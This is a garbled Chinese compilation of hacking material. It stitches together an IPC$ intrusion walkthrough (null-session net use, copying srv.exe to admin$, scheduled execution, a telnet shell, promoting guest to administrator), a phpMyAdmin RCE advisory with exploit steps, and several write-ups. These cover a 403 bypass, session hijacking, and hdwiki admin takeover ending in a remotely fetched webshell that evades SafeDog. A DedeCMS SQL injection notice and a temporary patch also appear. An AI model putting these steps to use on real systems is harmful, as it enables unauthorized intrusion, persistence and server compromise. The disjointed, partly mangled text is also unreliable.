一 相关命令

　　建立空连接:

　　net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

　　建立非空连接:

　　net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

　　映射默认共享:

　　net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

　　如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

　　删除一个ipc$连接

　　net use \\IP\ipc$ /del

　　删除共享映射

　　net use c: /del 删除映射的c盘，其他盘类推

　　net use * /del 删除全部,会有提示要求按y确认

　　提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.

　　二 经典入侵模式

　　1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

　　这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以之一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

　　2. C:\>copy srv.exe \\127.0.0.1\admin$

　　先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

　　3. C:\>net time \\127.0.0.1

　　查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

　　4. C:\>at \\127.0.0.1 11:05 srv.exe

　　用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

　　5. C:\>net time \\127.0.0.1

　　再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

　　6. C:\>telnet 127.0.0.1 99

　　这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

　　虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

　　7.C:\>copy ntlm.exe \\127.0.0.1\admin$

　　用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

　　8. C:\WINNT\system32>ntlm

　　输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

　　9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么想做什么就做什么吧,哈哈)

　　为了以防万一,我们再把guest激活加到管理组

　　10. C:\>net user guest /active:yes

　　将对方的Guest用户激活

　　11. C:\>net user guest 1234

　　将Guest的密码改为1234,或者你要设定的密码

　　12. C:\>net localgroup administrators guest /add

　　将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).

　　ipc$经典入侵步骤：

　　1、net use \\ip\ipc$ 密码 /user:用户名

　　2、copy 文件名 \\ip\c$

　　3、net time \\ip

　　4、at \\ip 时间 命令

　　5、入侵成功，连接你的肉鸡

　　常用的 *** 命令

　　net user 查看用户列表

　　net user 用户名 密码 /add 添加用户

　　net user 用户名 密码 更改用户密码

　　net localgroup administrators 用户名 /add 添加用户到管理组

　　net user 用户名 /delete 删除用户

　　net user 用户名 查看用户的基本情况

　　net user 用户名 /active:no 禁用该用户

　　net user 用户名 /active:yes 启用该用户

　　net share 查看计算机IPC$共享资源

　　net share 共享名 查看该共享的情况

　　net share 共享名=路径 设置共享。例如 net share c$=c:

　　net share 共享名 /delete 删除IPC$共享

　　net stop lanmanserver 关闭ipc$和默认共享依赖的服务

　　net use 查看IPC$连接情况

　　net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

　　net use \\ip\ipc$ /del 删除一个连接

　　net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

　　net use z: /del

　　net time \\ip 查看远程计算机上的时间

　　copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

　　net view ip 查看计算机上的共享资源

　　at 查看自己计算机上的计划作业

　　at \\ip 查看远程计算机上的计划作业

　　at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

　　at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

　　at \\ip all /delete 删除远程计算机上的全部计划作业

　　at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt；

　　下面纯手打，上面是度娘给的

　　taskkill /im 进程名 停止运行

　　tasklisy 查看运行进程

　　ipconfig 查看本机IP

　　md 创建文件夹

　　rd 删除文件夹

　　echo off > .txt|exit 添加文本

　　echo 内容 >> .txt 给文本添加内容

　　copy 复制文件

　　net user 用户名 密码/add 创建一个普通账号

　　net localgroup administrators 用户名 /add 把账户加入超级用户组

　　之一步: Tasklist/SVC 列出所有进程，系统服务及其对应的PID值!

　　而终端所对应的服务名为：TermService

　　

　　第二步：用netstat -ano命令，列出所有端口对应的PID值!

　　找到PID值所对应的端口

　　

　　同样，找Serv-U，radmin，等端口都适用!

　　下载地址：

　　 *** 下载地址：

　　欢迎留言~： ... mp;pos=catalog_list

　　===============================================================================

　　Author: Janek Vind "waraxe"

　　Date: 25. April 2013

　　Location: Estonia, Tartu

　　Web:

　　Description of vulnerable software:

　　~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

　　phpMyAdmin is a free software tool written in PHP, intended to handle the

　　administration of MySQL over the World Wide Web. phpMyAdmin supports a wide

　　range of operations with MySQL.

　　

　　###############################################################################

　　1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php"

　　###############################################################################

　　Reason:

　　1. insufficient sanitization of user data before using in preg_replace

　　Attack vectors:

　　1. user-supplied parameters "from_prefix" and "to_prefix"

　　Preconditions:

　　1. logged in as valid PMA user

　　2. PHP version

　　PMA security advisory: PMASA-2013-2

　　CVE id: CVE-2013-3238

　　Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2

　　Result: PMA user is able to execute arbitrary PHP code on webserver

　　Let's take a look at the source code:

　　Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8):

　　------------------------[ source code start ]----------------------------------

　　case 'replace_prefix_tbl':

　　$current=$selected[$i];

　　$newtablename=preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);

　　$a_query='ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' .

　　PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN

　　$run_parts=true;

　　break;

　　case 'copy_tbl_change_prefix':

　　$current=$selected[$i];

　　$newtablename=preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);

　　$a_query='CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM '

　　. PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN

　　$run_parts=true;

　　break;

　　------------------------[ source code end ]------------------------------------

　　We can see, that PHP variables "$from_prefix" and "$to_prefix" are used in

　　preg_replace function without any sanitization. It appears, that those variables

　　are coming from user submitted POST request as parameters "from_prefix" and

　　"to_prefix". It is possible to inject e-modifier with terminating null byte via

　　first parameter and php code via second parameter. In case of successful

　　exploitation injected PHP code will be executed on PMA webserver.

　　Tests:

　　1. Log in to PMA and select database:

　　

　　2. select one table from database by using checkbox and then select

　　"Replace table prefix" from select control "With selected:".

　　3. We can see form named "Replace table prefix:" with two input fields.

　　Type "/e%00" to the "From" field and "phpinfo()" to the "To" field.

　　4. Activate Tamper Data Firefox add-on:

　　

　　5. Click "Submit", Tamper Data pops up, choose "Tamper".

　　6. Now we can modify POST request. Look for parameter "from_prefix".

　　It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00".

　　Click "OK" and Firefox will send out manipulated POST request.

　　7. We are greeted by phpinfo function output - code execution is confirmed.

　　PMA version 4.0.0-RC2 contains almost identical vulnerability:

　　Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2):

　　------------------------[ source code start ]----------------------------------

　　case 'replace_prefix_tbl':

　　$current=$selected[$i];

　　$newtablename=preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);

　　$a_query='ALTER TABLE ' . PMA_Util::backquote($selected[$i]) .

　　' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN

　　$run_parts=true;

　　break;

　　case 'copy_tbl_change_prefix':

　　$current=$selected[$i];

　　$newtablename=preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);

　　$a_query='CREATE TABLE ' . PMA_Util::backquote($newtablename) .

　　' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN

　　$run_parts=true;

　　break;

　　------------------------[ source code end ]------------------------------------

　　############################################################################

　　2. Locally Saved SQL Dump File Multiple File Extension Remote Code Execution

　　############################################################################

　　Reason:

　　1. insecure names of locally saved dump files

　　Attack vectors:

　　1. user-supplied POST parameter "filename_template"

　　Preconditions:

　　1. logged in as valid PMA user

　　2. configuration setting "SaveDir" defined and pointed to

　　directory, which is writable for php and directly accessible over web

　　(by default "SaveDir" is empty and PMA is secure)

　　3. Apache webserver with unknown MIME for "sql" extension

　　PMA security advisory: PMASA-2013-3

　　CVE id: CVE-2013-3239

　　Affected are PMA versions 3.5.8 and 4.0.0-RC2

　　There is a security weakness in a way, how PMA handles

　　locally saved database dump files. It is possible, that saved

　　dump file has multiple extensions and if Apache webserver does not

　　know MIME type of "sql" extension (that's how it is by default),

　　then for example "foobar.php.sql" file will be treated as php file.

　　More information:

　　

　　section "Files with Multiple Extensions"

　　

　　section "Case 4: Double extensions (part 1)"

　　Test:

　　1. activate export to local server, be sure, that directory is writable:

　　$cfg['SaveDir']='';

　　2. select database for test, insert row into table with included

　　php code like ""

　　3. try to export that database or table, you have now additional option:

　　"Save on server in the directory "

　　Confirm that option, let the format be as "SQL".

　　"File name template" change to "@DATABASE () php" and click "Go" button.

　　Server responds with "Dump has been saved to file "

　　4. Request created file with webbrowser:

　　

　　In case of success we can see output of phpinfo() function, which

　　confirms remote code execution.

　　###############################################################################

　　3. Local File Inclusion in "export.php"

　　###############################################################################

　　Reason:

　　1. insufficient sanitization of user data before using in include_once

　　Attack vectors:

　　1. user-supplied POST parameter "what"

　　Preconditions:

　　1. logged in as valid PMA user

　　2. PHP must be

　　PMA security advisory: PMASA-2013-4

　　CVE id: CVE-2013-3240

　　Affected is PMA version 4.0.0-RC2

　　Php script "export.php" line 20:

　　------------------------[ source code start ]----------------------------------

　　foreach ($_POST as $one_post_param=> $one_post_value) {

　　$GLOBALS[$one_post_param]=$one_post_value;

　　}

　　PMA_Util::checkParameters(array('what', 'export_type'));

　　// export class instance, not array of properties, as before

　　$export_plugin=PMA_getPlugin(

　　"export",

　　$what,

　　'libraries/plugins/export/',

　　array(

　　'export_type'=> $export_type,

　　'single_table'=> isset($single_table)

　　)

　　);

　　------------------------[ source code end ]------------------------------------

　　We can see, that user-supplied parameter "what" is used as second argument for

　　the function PMA_getPlugin(). Let's follow execution flow:

　　Php script "libraries/plugin_interface.lib.php" line 20:

　　------------------------[ source code start ]----------------------------------

　　function PMA_getPlugin(

　　$plugin_type,

　　$plugin_format,

　　$plugins_dir,

　　$plugin_param=false

　　) {

　　$GLOBALS['plugin_param']=$plugin_param;

　　$class_name=strtoupper($plugin_type[0])

　　. strtolower(substr($plugin_type, 1))

　　. strtoupper($plugin_format[0])

　　. strtolower(substr($plugin_format, 1));

　　$file=$class_name . ".class.php";

　　if (is_file($plugins_dir . $file)) {

　　include_once $plugins_dir . $file;

　　------------------------[ source code end ]------------------------------------

　　As seen above, second argument "$plugin_format" is used in variable "$file"

　　and after that in functions is_file() and include_once(). No sanitization

　　is used against user submitted parameter "what", which leads to directory

　　traversal and local file inclusion vulnerability. In case of older PHP version

　　it may be possible to use null byte attack and include arbitrary files on server.

　　###############################################################################

　　4. $GLOBALS array overwrite in "export.php"

　　###############################################################################

　　Reason:

　　1. insecure POST parameters importing

　　Attack vectors:

　　1. user-supplied POST parameters

　　Preconditions:

　　1. logged in as valid PMA user

　　PMA security advisory: PMASA-2013-5

　　CVE id: CVE-2013-3241

　　Affected is PMA version 4.0.0-RC2

　　Php script "export.php" line 20:

　　------------------------[ source code start ]----------------------------------

　　foreach ($_POST as $one_post_param=> $one_post_value) {

　　$GLOBALS[$one_post_param]=$one_post_value;

　　}

　　PMA_Util::checkParameters(array('what', 'export_type'));

　　------------------------[ source code end ]------------------------------------

　　We can see, that arbitrary values in $GLOBALS array can be overwritten by

　　submitting POST parameters. Such way of input data importing can be considered

　　as very insecure and in specific situation it is possible to overwrite any

　　variable in global scope. This can lead to many ways of exploitation. Below is

　　presented one of the possibilities.

　　Php script "export.php" line 59:

　　------------------------[ source code start ]----------------------------------

　　$onserver=false;

　　$save_on_server=false;

　　...

　　if ($quick_export) {

　　$onserver=$_REQUEST['quick_export_onserver'];

　　} else {

　　$onserver=$_REQUEST['onserver'];

　　}

　　// Will we save dump on server

　　$save_on_server=! empty($cfg['SaveDir']) && $onserver;

　　...

　　// Open file on server if needed

　　if ($save_on_server) {

　　$save_filename=PMA_Util::userDir($cfg['SaveDir'])

　　. preg_replace('@[/\\\\]@', '_', $filename);

　　...

　　if (! $file_handle=@fopen($save_filename, 'w')) {

　　$message=PMA_Message::error(

　　...

　　if ($save_on_server) {

　　$write_result=@fwrite($file_handle, $dump_buffer);

　　fclose($file_handle);

　　------------------------[ source code end ]------------------------------------

　　As seen above, when configuration setting "SaveDir" is set, then it is possible

　　to save database dump to the PMA webserver. By default "SaveDir" is unset and

　　this prevents possible security problems. As we can overwrite any variables in

　　global scope, it is possible to set "SaveDir" to arbitrary value. This will

　　lead to directory traversal vulnerability - attacker is able to save database

　　dump to any directory in webserver, if only filesystem permissions allow that.

　　Database dump can be with extension ".sql". If attacker can dump database

　　with php code and tags in it, this content will be in dump file. If filename

　　is something like "foobar.php.sql", then by default most Apache webserver

　　installations will try to parse this dump file as php file, which can finally

　　lead to the remote code execution vulnerability.

　　Disclosure timeline:

　　~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

　　16.04.2013 -> Sent email to developers

　　16.04.2013 -> First response email from developers

　　16.04.2013 -> Sent detailed information to developers

　　24.04.2013 -> New PMA versions and security advisories released

　　25.04.2013 -> Current advisory released

　　Contact:

　　~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

　　come2waraxe () yahoo com

　　Janek Vind "waraxe"

　　Waraxe forum:

　　Personal homepage:

　　Random project:

　　---------------------------------- [ EOF ] ------------------------------------

　　今天搞一个网站,得到后台.但是打开得到 如下错误. 403 Forbidden Request forbidden by administrative rules. 这情况一般是 没有首页.或者限制IP. 明显后台首先是存在的.因为是ECSHOP的系统,后台index.php不能随意更改..修改的话同时需要修改一大堆调用.不便修改,那么就是IP限制了.. 这样访问提示 但当访问 这样奇迹就发生了因为conf文件是 Options Indexes FollowSymLinks AllowOverride None Order allow,deny #Allow from all Allow from 10.0.0.116 #Deny from 10.0.0.0/24/即符合规制APACHE执行限制,当时当加多一个//APACHE规制即不生效. test 环境 + Server: Apache/2.2.8 (CentOS)+ Retrieved x-powered-by header: PHP/5.2.10+ The anti-clickjacking X-Frame-Options header is not present.+ Root page / redirects to: Server banner has changed from 'Apache/2.2.8 (CentOS)' to 'Apache/2.2.3 (CentOS)' which may suggest a WAF, load balancer or proxy is in place

　　比较好玩的一个漏洞，应该没发过吧，估计又是一大片厂商呢

　　这个也是当初php框架问题了估计，PHPSESSID没有了解透彻啊，这个只是用来通过服务器的session换取令牌的东西，至少要跟着session一起变把，每个帐号不同时刻登陆的session肯定是不同的。反正我不是做开发也说不清楚，就说说利用方式把。 我们可以通过很多方式获得这个PHPSESSID，比如借用别人的电脑，xss等多种方式看图把，未登陆是有这个值的 问题就在于对于一台电脑这个值是永远不会变的，而只要当前电脑保持一个登陆状态已换取令牌，另外一台电脑就可以通过这个PHPSESSID直接登陆了 2台电脑也试过，现在截图都是本机的，不同浏览器一样的效果

　　登陆之前暴力注册的帐号wrhwrh2在chrome上登陆 这个时候通过上面所说的2种方式获取PHPSESSID，然后打开firefox，编辑cookies覆盖PHPSESSID 为了证明我确实是登陆的，用chrome修改资料，firefox刷新查看 好了 然后chrome换个帐号看看wrhwrh3，刷新firefox看看能不能再登陆 应该证明了把 修复方案：

　　这个洞有意思在于劫持任意该电脑帐号，比较有意思修复的话就是每次PHPSESSID变化，不同帐号或者同一帐号不同时刻登陆更好都变化，php基本不懂，可能说的不太对，但现在这样肯定有问题的

　　偶遇一hdwiki百科系统站，前台在词条创建人处发现一管理员

　　

　　进接通过账号社进后台，后台工能很强大，但是发现限权不够

　　

　　在会员管理处发现还存在超级管理员这类账号

　　

　　社工admin无果

　　反回后台，发现管理员帐号可以对网站的邮箱进行配置

　　

　　用的腾讯企业邮箱，通过查看源码直接获取邮箱密码

　　反回网站前台，在密码找回处填上刚才找到的admin邮箱，admin的密码找回链接会通过刚找到的邮箱发送

　　

　　在网页登录刚才的腾讯腾讯企业邮箱，在发件箱中看到admin的密码找回链接

　　

　　直接重置admin密码，再次登录后台，看到文件管理处很强大，可以新建文件也可以上传

　　

　　直接新建大马，被安全狗档住了

　　

　　新建getshell.php，

　　

　　代码

　　通过 getshell.phpcode=木马路径&file=1.txt，绕过安全狗对POST数据包检测的限制，让服务器下载我们的大马保存为1.txt

　　这是用到一个php的函数 file_get_contents()

　　这个函数可以从远程文件中读取内容

　　但前提是 php.ini 中allow_url_fopen 得为 on 才行

　　再新建shell.php

　　

　　代码

　　利用php文件包含来绕过过安全狗对文件内容检限制

　　

　　成功拿到shell一枚

　　没什么技术含量，大牛略过

　　近日，知道创宇安全研究人员发现互联网某“安全“公司网站于2013年4月19日发布“DEDECMS高危漏洞”（包括2个SQL注入漏洞），并发布相关漏洞分析细节，经我们分析发现这2个漏洞确实存在，其中一个漏洞dedecms官方于2013年4月22日发布最新补丁更新里得到了修补，而另外一个目前官方还没有推出任何补丁修补措施，属于0day漏洞，攻击者可通过该漏洞攻击使用dedecms的网站，最终可以导致网站“脱库”、“挂马”、“篡改”等风险。但由于该漏洞触发条件限制较多，我们评定为“中危”漏洞。我们已积极联系dedecms官方，请各位使用dedecms的站长们，及时更新到官方4月22日发布最新版本（V5.7正式版2013-04-22）同时启用临时补丁（详见下），并密切关注官方补丁更新动态。经测试确认加速乐无需任何更新即可防御该漏洞！

　　关于dedecms（织梦CMS）

　　DedeCMS基于PHP+MySQL的技术开发，支持多种服务器平台，从2004年开始发布之一个版本开始，至今已经发布了五个大版本。DedeCMS以简单、健壮、灵活、开源几大特点占领了国内CMS的大部份市场，目前已经有超过35万个站点正在使用DedeCMS或基于DedeCMS核心开发，产品安装量达到95万。是目前国内最常见的建站程序之一，也是“黑客”密切关注的对象！

　　官方网站：

　　漏洞触发演示（如下图）

　　

　　漏洞触发条件

　　1、要求php的魔术引号开关关闭（magic_quotes_gpc=Off）。

　　2、要求“会员中心”开启，并有可正常登陆使用的用户。

　　临时补丁

　　1、修改代码

　　文件

　　\member\ajax_membergroup.php

　　找到代码：

　　$sql="UPDATE `#@__member_friends` SET `description`='{$mdescription}' WHERE `fid`='{$mid}' AND `mid`='{$cfg_ml->M_ID}'";

　　在这代码之前加入如下代码:

　　$mdescription=addslashes($mdescription);

　　2、在php.ini文件里设置 magic_quotes_gpc=On

　　3、临时关闭“会员中心”。（登陆后台后，X作过程如下图）

　　

　　［编者注：我们对某“安全”公司不负责的随意进行漏洞披露、完全不顾及互联网广大网站及网民安全的行为，深表担忧！同时我们呼吁各安全企业同行及安全研究人员都加入到“负责任的漏洞披露流程”，为了“更好、更安全的互联网”一起努力！］

　　首要说明一点的就是：作个真正的黑客是绝对不会那么容易练就的！如果自己下定决心想学色的黑客技术，你就必须要进入：“为编写各种计算机底层程序而如醉如痴；为学习计算机操作系统内部结构、计算机汇编语言编程、计算机 *** 原理和协议、扎实的各种数学基础等枯燥无味的知识而长期忍受寂寞”的状态！

　　只有这样，你才有可能成为一名真正的黑客！你才有可能自如地使用各种工具（包括使用 cmd 命令状态）攻击别人（包括黑客组织）的 IP 地址（通常是服务器的静态 IP 地址）。

　　当然了，最后要说的一句话就是：即使真的拥有了 HACKER的技术，也还是要做红客的事情，千万不要干那些令人所不齿的坏事情。记住：伸手必被捉！

　　分你要哪种攻击了，DDOS,Telnet,IPC$，DDOS用cmd你就得狂砸Ping，Telnet对方没开服务用不了，IPC＄不知道对方密码也是扯淡，还得用工具，没你想的那么简单！

　　没你想的那么简单。利用cmd可能就是共享漏洞。

　　cmd不可能攻击死别人除非用发包工具